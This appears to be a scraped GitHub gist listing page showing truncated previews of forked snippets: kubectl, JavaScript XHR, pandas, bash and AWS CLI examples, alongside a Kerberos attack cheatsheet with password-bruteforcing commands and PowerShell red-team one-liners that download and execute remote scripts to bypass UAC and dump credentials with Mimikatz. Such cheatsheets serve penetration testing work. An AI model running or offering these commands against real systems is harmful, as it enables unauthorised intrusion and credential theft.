Skip to content

Instantly share code, notes, and snippets.

## Useful Commands
Get kubectl version
kubectl version
Get cluster info:
@babywyrm
babywyrm / user.js
Created December 27, 2020 01:59 — forked from EtienneR/user.js
XMLHttpRequest RESTful (GET, POST, PUT, DELETE)
// Get all users
var url = "http://localhost:8080/api/v1/users";
var xhr = new XMLHttpRequest()
xhr.open('GET', url, true)
xhr.onload = function () {
var users = JSON.parse(xhr.responseText);
if (xhr.readyState == 4 && xhr.status == "200") {
console.table(users);
} else {
console.error(users);
@babywyrm
babywyrm / useful_pandas_snippets.py
Created November 1, 2020 01:46 — forked from fomightez/useful_pandas_snippets.py
Useful Pandas Snippets
# List unique values in a DataFrame column
df['Column Name'].unique()
# To extract a specific column (subset the dataframe), you can use [ ] (brackets) or attribute notation.
df.height
df['height']
# are same thing!!! (from http://www.stephaniehicks.com/learnPython/pages/pandas.html
# -or-
# http://www.datacarpentry.org/python-ecology-lesson/02-index-slice-subset/)
@babywyrm
babywyrm / kerberos_attacks_cheatsheet.md
Created September 27, 2020 01:54 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@babywyrm
babywyrm / pyscripter_snippets.py
Created August 21, 2020 23:30 — forked from lanmaster53/pyscripter-snippets.py
Burp Python Scripter scripts
import sys
# Provides introspection into the Python Scripter API.
apis = ('extender', 'callbacks', 'helpers', 'toolFlag', 'messageIsRequest', 'messageInfo')
funcs = (type, dir)
if messageIsRequest:
for api in apis:
print('\n{}:\n{}'.format(api, '='*len(api)))
@babywyrm
babywyrm / DevAlias-PentestEnvironmentSetup.sh
Created August 16, 2020 00:36 — forked from 0xdevalias/DevAlias-PentestEnvironmentSetup.sh
My steps to setup a new pentest environment
# /dev/alias Pentest Environment Setup
# Version: 0.2 (20131211)
# Created By: Glenn 'devalias' Grant (http://devalias.net)
# License: The MIT License (MIT) - Copyright (c) 2013 Glenn 'devalias' Grant (see http://choosealicense.com/licenses/mit/ for full license text)
# TODO:
# * Option to check if tools (from this script and external) exist/are already installed and what versions
# * Eg nmap , metasploit, etc
# * Lair: https://github.com/fishnetsecurity/Lair
# * apt-get install python-pip
@babywyrm
babywyrm / bash script cheat sheet
Created August 15, 2020 17:01 — forked from githubfoam/bash script cheat sheet
bash script cheat sheet
-----------------------------------------------------------------------------------------------------
#!/bin/bash
set -o errexit
set -o pipefail
set -o nounset
set -o xtrace
# set -eox pipefail #safety for script
------------------------------------------------------------------------------------------
shell script
$0 represent the shell script file name itself
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands

Master

"Knowledge is powerful, be careful how you use it!"

A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more.

@babywyrm
babywyrm / README.md
Created March 8, 2020 22:24 — forked from avoidik/README.md
AWS query examples

Top 10 Examples of AWS CLI Query

List Volumes showing attachment using Dictionary Notation

$ aws ec2 describe-volumes \
  --query 'Volumes[*].{ID:VolumeId,InstanceId:Attachments[0].InstanceId,AZ:AvailabilityZone,Size:Size}'
[
    {
        "InstanceId": "i-a071c394",